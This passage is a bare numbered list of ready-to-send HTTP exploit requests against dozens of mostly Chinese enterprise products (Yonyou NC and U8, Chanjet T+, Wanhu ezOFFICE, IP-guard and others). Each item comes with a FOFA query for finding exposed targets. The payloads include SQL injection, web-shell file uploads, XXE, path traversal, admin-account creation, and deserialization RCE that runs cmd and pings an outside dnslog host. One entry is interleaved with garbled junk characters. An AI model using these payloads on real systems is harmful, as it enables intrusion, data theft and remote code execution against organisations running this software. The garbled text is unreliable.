------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Uploaded file path:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Uploaded file path:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech (迪普) VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: visit the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: with the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"

POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"

GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

+ T3 R/ V. ]" e: z! I4 w4 Q0 O  I61. 浙大恩特客户资源管理系统 fileupload 任意文件上传8 b' r. p/ ?. N4 _4 O1 l0 p
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
7 j' F  V) @- pPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1$ L7 @, `; J. Y3 {" L
Host: x.x.x.x
1 _: ], B* Y! o/ oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: M9 @/ g& m9 N- MConnection: close
: A$ e- B' ]& x3 pContent-Length: 27
) z* h" _6 L# E3 s* BAccept: */*3 \8 q2 B3 ]  S' S: x
Accept-Encoding: gzip, deflate3 Q) }5 @/ T) A. g  a+ U
Accept-Language: en
5 f' C0 f* h1 M1 ^Content-Type: application/x-www-form-urlencoded! n( v: @1 Z; g

& s- i* u- l! A4 H2 J" B8uxssX66eqrqtKObcVa0kid98xa
$ A! c0 P* A" B# R- O! W6 y- d& _  x# S4 l. A
+ R; `( i5 p0 |
62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"

GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"

POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"

POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youkate (优卡特) LianAiYun all-in-one face-recognition smart management platform 1.0.55.0.0.1 privilege bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created.

POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file type.

POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu ezEIP success command execution
FOFA: app="万户网络-ezEIP"

POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"

GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

